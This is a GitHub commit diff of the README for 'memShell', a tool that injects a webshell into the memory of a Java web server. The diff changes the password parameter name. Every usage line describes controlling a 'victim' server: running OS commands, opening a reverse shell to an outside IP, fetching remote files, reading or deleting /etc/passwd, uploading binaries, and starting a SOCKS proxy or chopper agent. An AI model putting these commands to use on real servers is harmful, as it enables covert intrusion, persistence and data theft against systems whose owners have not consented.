You signed in with another tab or window. Reload to refresh your session.You signed out in another tab or window. Reload to refresh your session.You switched accounts on another tab or window. Reload to refresh your session.Dismiss alert
Copy file name to clipboardExpand all lines: README.md
+9-9
Original file line number
Diff line number
Diff line change
@@ -6,15 +6,15 @@ a webshell resides in the memory of java web server
6
6
* cd memShell
7
7
* java -jar inject.jar
8
8
# usage
9
-
* anyurl?pwd=pass //show this help page.
10
-
* anyurl?pwd=pass&model=exec&cmd=whoami //run os command.
11
-
* anyurl?pwd=pass&model=connectback&ip=8.8.8.8&port=51 //reverse a shell back to 8.8.8.8 on port 51.
12
-
* anyurl?pwd=pass&model=urldownload&url=http://xxx.com/test.pdf&path=/tmp/test.pdf //download a remote file via the victim's network directly.
13
-
* anyurl?pwd=pass&model=list[del|show]&path=/etc/passwd //list,delete,show the specified path or file.
14
-
* anyurl?pwd=pass&model=download&path=/etc/passwd //download the specified file on the victim's disk.
15
-
* anyurl?pwd=pass&model=upload&path=/tmp/a.elf&content=this_is_content[&type=b] //upload a text file or a base64 encoded binary file to the victim's disk.
16
-
* anyurl?pwd=pass&model=proxy //start a socks proxy server on the victim.
17
-
* anyurl?pwd=pass&model=chopper //start a chopper server agent on the victim.
9
+
* anyurl?pass_the_world=pass //show this help page.
10
+
* anyurl?pass_the_world=pass&model=exec&cmd=whoami //run os command.
11
+
* anyurl?pass_the_world=pass&model=connectback&ip=8.8.8.8&port=51 //reverse a shell back to 8.8.8.8 on port 51.
12
+
* anyurl?pass_the_world=pass&model=urldownload&url=http://xxx.com/test.pdf&path=/tmp/test.pdf //download a remote file via the victim's network directly.
13
+
* anyurl?pass_the_world=pass&model=list[del|show]&path=/etc/passwd //list,delete,show the specified path or file.
14
+
* anyurl?pass_the_world=pass&model=download&path=/etc/passwd //download the specified file on the victim's disk.
15
+
* anyurl?pass_the_world=pass&model=upload&path=/tmp/a.elf&content=this_is_content[&type=b] //upload a text file or a base64 encoded binary file to the victim's disk.
16
+
* anyurl?pass_the_world=pass&model=proxy //start a socks proxy server on the victim.
17
+
* anyurl?pass_the_world=pass&model=chopper //start a chopper server agent on the victim.
18
18
19
19
**!!!It is recommended to use the POST method to submit data.**
0 commit comments